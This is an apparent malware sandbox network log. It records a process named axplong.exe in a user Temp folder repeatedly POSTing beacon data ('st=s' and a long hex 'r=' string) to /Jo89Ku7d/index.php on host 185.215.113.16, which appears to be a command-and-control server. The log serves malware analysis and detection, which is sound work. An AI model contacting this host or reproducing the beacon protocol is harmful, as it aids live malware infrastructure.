Sep 27, 2024 07:02:25.948371887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49732	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:26.059314966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:26.789566994 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:26.790895939 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:27.028249025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49733	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:27.137274981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:27.836354017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:27.837341070 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:28.060637951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49734	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:28.168579102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:28.862435102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:28.863321066 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:29.092494011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49735	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:29.333518028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:29.991930008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:29.994066000 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:30.232722044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49736	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:30.343944073 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:31.051039934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:31.051928997 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:31.282519102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49737	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:31.402669907 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:32.121578932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:32.195930004 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:32.423513889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49738	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:32.601516962 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:33.302517891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:33.303366899 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:33.526953936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49739	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:33.636814117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:34.334193945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:34.335016966 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:34.561512947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49740	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:34.683742046 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:35.383037090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:35.383995056 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:35.613106012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49741	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:35.730496883 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:36.482850075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:36.483800888 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:36.711925030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49742	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:36.824736118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:37.539880991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:37.540976048 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:37.801249027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49743	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:37.922290087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:38.622405052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:38.623269081 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:38.850204945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49744	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:38.970168114 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:39.704443932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
